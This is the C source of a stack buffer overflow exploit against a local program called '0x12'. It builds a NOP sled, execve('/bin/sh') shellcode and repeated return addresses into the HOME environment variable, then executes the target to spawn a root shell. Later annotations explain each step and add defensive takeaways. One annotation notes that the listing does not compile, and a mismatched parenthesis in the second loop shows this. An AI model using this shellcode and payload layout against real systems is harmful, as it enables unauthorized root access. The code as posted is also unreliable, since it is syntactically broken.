- /********************************************************************************/
- /* 0x12 (sh1ts4uce) exploit by phyrrus9 */
- /* Copyright(c) 2012 phyrrus9 and the Private Dev Team */
- /* */
- /*This program will execute a standard buffer overflow and spawn a root shell by*/
- /*using a standard ramdisk block with the placement of NOP characters at needed */
- /*locations allowing the device to jump straight to the shell execution code and*/
- /*spawn the root shell. This is then handled by some other magical force in the*/
- /*universe. This code is NOT public, and shall never be as I dont want to show */
- /*anybody the work I do because I am a lazy asshole and you can just shove it if*/
- /*you have a problem about it. Have a nice day and thank you for your time!!!!!*/
- /* */
- /* If you have questions or concerns, email me at <phyrrus9@gmail.com> */
- /********************************************************************************/
- #include <stdio.h>
- #include <unistd.h>
- #include <stdlib.h>
- static char shellcode[]= /* Opaque machine-code payload stored as a byte string.
     Its last eight bytes are the ASCII text "/bin/shX", and it contains the byte
     pair cd 80, which on 32-bit x86 Linux is the int 0x80 system-call instruction.
     The file header gives its purpose as spawning a shell.
     For defenders: an environment variable or argument that carries a "/bin/sh"
     string next to non-printable bytes is a strong indicator of this payload
     family. */
- "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
- "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
- #define NOP 0x90 /* x86 one-byte no-op opcode, used below as filler in front of the payload */
- #define LEN 1032 /* total size in bytes of the string placed in HOME; presumably chosen to exceed a fixed-size buffer in the target, which is not shown here (confirm) */
- #define RET 0xbffff574 /* hard-coded address written repeatedly into the payload; it is only meaningful where the target's stack sits at a predictable address and is executable, so ASLR and a non-executable stack invalidate it */
- int main() /* Builds a LEN-byte payload in a local buffer, exports it as the HOME
     environment variable, then replaces this process with the program "0x12"
     through execlp(). The file header states the intent is a stack buffer
     overflow in that program; the target's code is not on this page, so the
     unbounded copy of $HOME it relies on is presumed, not demonstrated.
     NOTE(review): as posted this listing does not compile, so read it as an
     illustration of the technique rather than a tested proof of concept.
     Defensive takeaways: code that reads HOME (or any environment string) must
     bound the copy to the destination size; stack protectors, a non-executable
     stack and ASLR each break an assumption this payload layout depends on;
     and an environment variable about 1 KiB long that is mostly 0x90 bytes
     followed by one repeating 4-byte value is worth alerting on. */
- {
- fprintf(stderr, "Initializing 0x21");
- char buffer[LEN]; /* staging area for the payload string */
- long retaddr = RET; /* the fixed address from RET, kept in a long so it can be stored word-wise below */
- int i;
- fprintf(stderr, "============================");
- fprintf(stderr, "Initialized!!!!!");
- fprintf(stderr,"using address 0x%lx\n",retaddr);
- fprintf(stderr, "Preload begin stage one ");
- /* flood: fill the whole buffer with copies of retaddr, one every 4 bytes */
- for (i=0;i<LEN;i+=4)
- *(long *)&buffer[i] = retaddr; /* a long store at a 4-byte stride implies a 32-bit (ILP32) build */
- fprintf(stderr, "flooded buffer with returns ");
- fprintf(stderr, "begin stage two ");
- /* a little puzzle piecing: overwrite the front of the buffer with NOP bytes,
     stopping strlen(shellcode)+100 bytes before the end */
- for (i=0;i<LEN-strlen(shellcode)-100);i++)
- *(buffer+i) = NOP;
- fprintf(stderr, "placed padding on exploit ");
- fprintf(stderr, "begin stage three ");
- /* place the exploit: copy the payload bytes directly after the NOP run; the
     bytes after it still hold the address copies written by the first loop */
- memcpy(buffer+i,shellcode,strlen(shellcode));
- fprintf(stderr, "copied exploit to ramdisk ");
- fprintf(stderr, "begin stage four ");
- setenv("HOME", buffer, 1); /* delivery channel: the payload travels in HOME; the final argument 1 replaces any existing value */
- fprintf(stderr, "Final stage begin ");
- fprintf(stderr, "Execute exploit and spawn #");
- execlp("0x12","0x12",NULL); /* looks up "0x12" on PATH and executes it with the modified environment; on success nothing below runs */
- return 0; /* reached only if execlp() failed; the failure is not reported */
- }